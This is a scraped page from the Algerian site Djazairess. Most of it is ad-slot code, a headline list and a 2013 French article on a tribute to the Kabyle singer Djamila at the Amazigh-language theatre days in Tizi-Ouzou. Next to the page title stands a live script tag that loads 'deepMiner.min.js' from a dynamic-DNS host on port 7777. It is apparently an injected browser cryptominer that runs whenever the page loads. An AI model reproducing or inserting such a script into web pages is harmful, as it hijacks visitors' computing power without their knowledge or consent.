googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : Hommage à Djamila<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





Hommage à Djamila
Journées théâtrales d'expression amazighe
Publié dans Horizons le 18 - 12 - 2013


Hommage sera rendu à l'artiste accomplie Djamila. La manifestation est organisée par la direction de la culture de la wilaya de Tizi-Ouzou, l'assemblée populaire de wilaya, l'association culturelle « Amezgoune N'Djerdjer » et l'APC d'Aït Bouaddou qui ont concocté un programme des plus riches. Djamila, de son vrai nom Bachène Djouhar, est née le 02 mai 1930 dans le village d'Aït Bouhini, dans la commune de Yakourene. Djamila reste une icône de la chanson kabyle et du cinéma algérien et sa carrière n'est plus à présenter. Son arrivée dans le cinéma a eté favorisée par Lalla Yamina, l'autre icône de la chanson kabyle, qui avait découvert son talent et la voix de Djohar avant de la prendre sous son aile. D'abord en lui ouvrant les portes de la radio algérienne avec des essais pour les besoins d'une émission radiophonique. Djamila volera ensuite de ses propres ailes et entamera une longue carrière radiophonique comme animatrice dans une émission intitulée « Les femmes au foyer ». A la fois auteur et interprète, Djamila chantera ses propres chansons telles que Abahri, Siwed-as Sllam, Tamurt, Lezzayer, Aya Assas El Djamaâ. Elle interprétera, également, des rôles à la télévision dans des sitcoms en duo avec Mohamed Hilmi puis au cinéma, dans les films « Le colonel Si Belaid », « Le bus des rêves », « Le vent des Aurès », « Les hors-la-loi », « Leila et les autres », entre autres. Elle collectionne donc de nombreuses chansons dont « Arnuyas Aman a xali », « Amla3yun » et « Aya hmem » qui restent les inoubliables tubes de la chanson kabyle. Le coup d'envoi de ces journées théâtrales qui a été donné par Djamila en présence du directeur de la culture de Tizi-Ouzou, du P/APC de Ait-Bouaddou et des présidents des associations organisatrices ainsi que celui de Numédia d'Oran. Une ouverture qui a été suivie d'une pièce intitulée « Agrawli », interprétée par l'association « Numidia » d'Oran. Djamila ne manquera pas à son tour de rendre hommage et remercier tous ceux qui ont œuvré pour la tenue de ces journées et surtout d'avoir pensé à elle. « Il faut songer à honorer les artistes qui sont encore à l'ombre » ajoutera-t-elle. Les amoureux du quatrième art auront rendez-vous avec l'association « Assirem Bouzeguene » qui se produira avec la pièce « Tayri Tegga Tmacint » et l'association « Tala » de Draâ El Mizan avec la pièce « Hasen ameggad ». Au programme d'aujourd'hui une communication animée par Nordine Aït Slimane sous le thème « La caractérisation du personnage » mais aussi une pièce intitulée « zalamit » jouée par la troupe de Barbacha. Pour la journée de demain, le public aura rendez-vous avec l'association « Aghbalu » qui interprètera la pièce « Myaraden akken ad dduklen » l'association de Ghardaïa avec la pièce « yer melmi ». Cette 11e édition des journées nationales théâtrales d'expression amazighe sera clôturée samedi avec un monologue de Hocine Ouarab qui ponctuera la remise des prix aux participants.

Cliquez ici pour lire l'article depuis sa source.